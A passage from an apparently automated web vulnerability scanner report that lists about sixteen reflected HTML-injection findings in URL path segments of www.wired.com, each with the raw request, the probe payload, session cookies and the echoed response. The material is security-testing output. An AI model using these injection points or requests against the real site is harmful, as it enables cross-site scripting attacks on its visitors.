The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821e8"><a>04b40dd3412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/mac821e8"><a>04b40dd3412 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=551
Expires: Sun, 21 Nov 2010 23:17:48 GMT
Date: Sun, 21 Nov 2010 23:08:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_mac821e8"><a>04b40dd3412">
...[SNIP]...

1.137. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/miscellaneous

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90641"><a>ba5864f027 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets90641"><a>ba5864f027/miscellaneous HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29360
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:03 GMT
Date: Sun, 21 Nov 2010 23:08:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets90641"><a>ba5864f027 ss_miscellaneous">
...[SNIP]...

1.138. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/miscellaneous

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae2a5"><a>4df9c3f8bcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/miscellaneousae2a5"><a>4df9c3f8bcc HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_miscellaneousae2a5"><a>4df9c3f8bcc">
...[SNIP]...

1.139. http://www.wired.com/gadgets/mods [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mods

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6cc"><a>2ec7c30f53a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets5c6cc"><a>2ec7c30f53a/mods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29344
Vary: Accept-Encoding
Cache-Control: max-age=231
Expires: Sun, 21 Nov 2010 23:12:08 GMT
Date: Sun, 21 Nov 2010 23:08:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets5c6cc"><a>2ec7c30f53a ss_mods">
...[SNIP]...

1.140. http://www.wired.com/gadgets/mods [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mods

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc27"><a>e4a182d7a54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/modsedc27"><a>e4a182d7a54 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29344
Vary: Accept-Encoding
Cache-Control: max-age=595
Expires: Sun, 21 Nov 2010 23:18:45 GMT
Date: Sun, 21 Nov 2010 23:08:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_modsedc27"><a>e4a182d7a54">
...[SNIP]...

1.141. http://www.wired.com/gadgets/pcs [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/pcs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29290"><a>3e97c83f0a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets29290"><a>3e97c83f0a7/pcs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:18 GMT
Date: Sun, 21 Nov 2010 23:08:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets29290"><a>3e97c83f0a7 ss_pcs">
...[SNIP]...

1.142. http://www.wired.com/gadgets/pcs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/pcs

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea349"><a>abc8fc5b833 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/pcsea349"><a>abc8fc5b833 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:47 GMT
Date: Sun, 21 Nov 2010 23:08:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_pcsea349"><a>abc8fc5b833">
...[SNIP]...

1.143. http://www.wired.com/gadgets/portablemusic [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/portablemusic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139b1"><a>6824c99afe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets139b1"><a>6824c99afe8/portablemusic HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 23:12:16 GMT
Date: Sun, 21 Nov 2010 23:08:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets139b1"><a>6824c99afe8 ss_portablemusic">
...[SNIP]...

1.144. http://www.wired.com/gadgets/portablemusic [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/portablemusic

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9890b"><a>1a2bf9e403d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/portablemusic9890b"><a>1a2bf9e403d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:08:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_portablemusic9890b"><a>1a2bf9e403d">
...[SNIP]...

1.145. http://www.wired.com/gadgets/wireless [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/wireless

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45461"><a>16a5e5e1666 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets45461"><a>16a5e5e1666/wireless HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:23 GMT
Date: Sun, 21 Nov 2010 23:08:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets45461"><a>16a5e5e1666 ss_wireless">
...[SNIP]...

1.146. http://www.wired.com/gadgets/wireless [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/wireless

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd750"><a>8d8676eb6a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/wirelessbd750"><a>8d8676eb6a9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=597
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:08:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_wirelessbd750"><a>8d8676eb6a9">
...[SNIP]...

1.147. http://www.wired.com/gaming [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4899"><a>1ca469d09ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaminga4899"><a>1ca469d09ed HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29382
Vary: Accept-Encoding
Cache-Control: max-age=222
Expires: Mon, 22 Nov 2010 01:15:04 GMT
Date: Mon, 22 Nov 2010 01:11:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaminga4899"><a>1ca469d09ed">
...[SNIP]...

1.148. http://www.wired.com/gaming/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b691"><a>f527151e420 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming3b691"><a>f527151e420/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29383
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 20:18:56 GMT
Date: Sun, 21 Nov 2010 20:14:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming3b691"><a>f527151e420">
...[SNIP]...

1.149. http://www.wired.com/gaming/gamingreviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/gamingreviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e36d"><a>49ae0050530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming5e36d"><a>49ae0050530/gamingreviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=232
Expires: Sun, 21 Nov 2010 23:12:30 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming5e36d"><a>49ae0050530 ss_gamingreviews">
...[SNIP]...

1.150. http://www.wired.com/gaming/gamingreviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/gamingreviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de64"><a>eaff00508ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming/gamingreviews1de64"><a>eaff00508ec HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:07 GMT
Date: Sun, 21 Nov 2010 23:09:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming ss_gamingreviews1de64"><a>eaff00508ec">
...[SNIP]...

1.151. http://www.wired.com/gaming/hardware [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/hardware

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e9a"><a>5d92c74d73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gamingc5e9a"><a>5d92c74d73d/hardware HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29403
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:26 GMT
Date: Sun, 21 Nov 2010 23:08:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gamingc5e9a"><a>5d92c74d73d ss_hardware">
...[SNIP]...

1.152. http://www.wired.com/gaming/hardware [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/hardware

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 511f3"><a>a929ebce08d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming/hardware511f3"><a>a929ebce08d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
